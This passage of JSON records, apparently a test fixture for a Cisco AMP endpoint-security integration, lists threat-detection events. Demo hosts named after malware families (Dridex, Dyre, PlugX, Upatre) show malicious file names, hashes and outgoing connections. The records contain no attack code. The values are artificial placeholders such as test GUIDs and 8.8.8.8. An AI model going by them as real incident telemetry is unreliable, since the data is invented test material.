Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209764771561000,"timestamp":1610705269,"timestamp_nanoseconds":265000000,"date":"2021-01-15T10:07:49+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209764771561497","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256537510543000,"timestamp":1610705265,"timestamp_nanoseconds":319000000,"date":"2021-01-15T10:07:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256537510543407","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":187000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841155","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55722,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841158","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55725,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841157","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55724,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841156","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55723,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841154","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55721,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":47000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333324762873857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55720,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155907656771961000,"timestamp":1610705263,"timestamp_nanoseconds":912000000,"date":"2021-01-15T10:07:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155907656771960835","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\All Users\\VirusMap\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":1428,"disposition":"Clean","file_name":"mcvsmap.exe","identity":{"sha256":"ae16e10e621d6610a3f7f2c7122f9d1263700ba02d1b90e42798decb2fe84096","sha1":"9224de3af2a246011c6294f64f27206d165317ba","md5":"4e1e0b8b0673937415599bf2f24c44ad"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155907656771961000,"timestamp":1610705263,"timestamp_nanoseconds":162000000,"date":"2021-01-15T10:07:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155907656771960834","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\John Smith\\Local Settings\\Temp\\RarSFX1\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":3596,"disposition":"Malicious","file_name":"ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155907648182026000,"timestamp":1610705261,"timestamp_nanoseconds":724000000,"date":"2021-01-15T10:07:41+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155907648182026241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ps.exe","file_path":"\\\\?\\C:\\Documents and Settings\\John Smith\\Desktop\\ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"},"archived_file":{"disposition":"Malicious","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48"}},"parent":{"process_id":3896,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b18a0d4beba606bf30f5010ba3c72abafac80d5f303a8bffb24d7f7b78b786e6","sha1":"eadce51c88c8261852c1903399dde742fba2061b","md5":"b60dddd2d63ce41cb8c487fcfbb6419e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209700347052000,"timestamp":1610705254,"timestamp_nanoseconds":882000000,"date":"2021-01-15T10:07:34+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209700347052056","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256485970936000,"timestamp":1610705253,"timestamp_nanoseconds":307000000,"date":"2021-01-15T10:07:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256485970935854","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209670282281000,"timestamp":1610705247,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:07:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209670282280983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256434431328000,"timestamp":1610705241,"timestamp_nanoseconds":295000000,"date":"2021-01-15T10:07:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256434431328301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900178000400,"timestamp":1610705238,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:07:18+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"GenericKD:Dyreza-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705238,"start_date":"2021-01-15T10:07:18+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb"},"parent":{"disposition":"Malicious","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209605857772000,"timestamp":1610705232,"timestamp_nanoseconds":855000000,"date":"2021-01-15T10:07:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209605857771542","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":358000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655340","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"VyCoQwOmMNmrVgs.exe","file_path":"\\\\?\\C:\\Windows\\VyCoQwOmMNmrVgs.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":2812,"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":343000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655339","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":280000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"VyCoQwOmMNmrVgs.exe","file_path":"\\\\?\\C:\\Windows\\VyCoQwOmMNmrVgs.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":2812,"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}}} 